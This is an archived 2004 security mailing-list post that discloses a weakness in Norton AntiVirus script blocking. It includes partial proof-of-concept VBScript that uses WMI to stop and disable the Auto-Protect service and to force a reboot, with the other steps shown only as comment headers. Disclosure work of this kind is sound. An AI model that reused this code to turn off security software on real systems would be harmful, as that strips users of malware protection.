Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [VulnWatch] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code) |
|---|---|
| Date: | Thu, 11 Nov 2004 06:32:20 -0500 |
Hi All,
http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html - Norton AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed)
http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html - Norton AntiVirus 2004/2005 Script Blocking Redux
Symantec's Response to this issue: (From a week ago)
Huh?
In a nutshell, here's what it does:
On Reboot it sets...
1) The NAV Auto-Protect Service to DISABLED 2) A registry key to Uninstall Script Blocking 3) Creates, launches a VBScript file to d/l the EICAR AV 'test' virus 4) Launches the EICAR.COM test pattern a few seconds later
....Then Reboots your computer.
--------------//// BEGIN DISABLE_NAV.VBS ////-----------------
' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----
sServer = "."
Set oWMI = GetObject("winmgmts://.")sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
& "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
oService.StopService
oService.ChangeStartMode("Disabled")
Next' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ----------
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------
' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------
' -------- LAUNCH EICAR DOWNLOADER ----------
' -------- RUN THE 'VIRUS' ----------
' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----
Set wmi = GetObject("winmgmts:{(Shutdown)}")
set objset = wmi.instancesof("win32_operatingsystem")
for each obj in objset
set os = obj : exit for
next
os.win32shutdown 2 + 4--------------//// END DISABLE_NAV.VBS ////-----------------
Best Regards, Daniel Milisic
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [Full-Disclosure] Nortel Networks Contivity VPN Client information leakage vulnerability, Network Intelligence (I) Pvt. Ltd. |
|---|---|
| Next by Date: | [Full-Disclosure] TWiki search function allows arbitrary shell command execution, Hans Ulrich Niedermann |
| Previous by Thread: | [Full-Disclosure] Nortel Networks Contivity VPN Client information leakage vulnerability, Network Intelligence (I) Pvt. Ltd. |
| Next by Thread: | [Full-Disclosure] TWiki search function allows arbitrary shell command execution, Hans Ulrich Niedermann |
| Indexes: | [Date] [Thread] [Top] [All Lists] |